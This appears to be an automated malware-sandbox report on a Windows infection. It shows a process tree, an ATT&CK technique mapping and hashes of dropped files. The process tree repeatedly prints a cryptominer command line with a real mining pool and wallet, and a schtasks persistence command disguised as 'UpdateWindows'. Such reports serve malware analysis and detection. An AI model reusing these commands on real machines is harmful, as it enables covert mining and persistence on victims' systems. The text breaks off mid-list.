                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4148
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4540
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5236
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2816
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 05:25 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5756
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A2AA.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A2AA.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6424
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AC02.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AC02.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6160
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6792
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B569.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B569.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4896
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 736
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6412
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 752
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6920
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 848
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4136
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 884
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6300
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 724
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6992
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BC8E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BC8E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4964
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6248
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2916
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7160
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7032
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6208
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5136
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4944
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5568
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5064

                                                                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                            Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Windows Multimedia Platform\FHAWFXNBUB\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Windows Multimedia Platform\FHAWFXNBUB\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\install.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              806c3221a013fec9530762750556c332

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\install.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              5afb716c6eb2e213325cf8e0b48b30d2

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              3832c8d9493d0a7896f2447b17d55fa41a692d93

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              4accba28a3c759cb0e5f69e515519bf29c811fa5fa44935a1ca9fe1aef032e61

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              ba67479cf602286ab7aa34df87d254d841e46ad409aacc83d17179af1fd1deed4c5f6ee9ec1ce4279ec9e53ce3a7863d43537185c86fc118047f7c32c4fde8b3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              421bd348231fda24a81347e44b8255fe

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              51025d5a8cf4badec8d1eefc41cb3a0fefbc7ddc

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              f41993aba2afaea2e17de617de877d2e55141278fe68b986ef5a0907a60a7eb4

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              bfc5cd8c787a7d922278c91531e2e23c051601b44c8393a02e057b2b0eef2d44f1d808f309970f90e372bce4adfce477742f793c6e92ca332b285d254b678ca3

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\12ze1sjv.dby\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              2f4861fc9730ffce140d6f32196e5cf4

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              8ac1be22b9aa726d84e0390651c3026a9f452881

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              046bc77643df6e13f192174f48f906b4e1ccdb026dd8e208d30eebb04a2dc23d

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              a97bdb43a45539e1c9235b30890ec870e7c01a4736b67891e72b0d046c8cec2d60303d64a157cf7f47d65451f2eccf73eb6aeb8db00f57cd6748b2384463cee0

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\12ze1sjv.dby\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              2f4861fc9730ffce140d6f32196e5cf4

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              8ac1be22b9aa726d84e0390651c3026a9f452881

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              046bc77643df6e13f192174f48f906b4e1ccdb026dd8e208d30eebb04a2dc23d

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              a97bdb43a45539e1c9235b30890ec870e7c01a4736b67891e72b0d046c8cec2d60303d64a157cf7f47d65451f2eccf73eb6aeb8db00f57cd6748b2384463cee0

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1902107571.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1902107571.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2kvhedq5.aep\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              531020fb36bb85e2f225f85a368d7067

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2kvhedq5.aep\google-game.exe
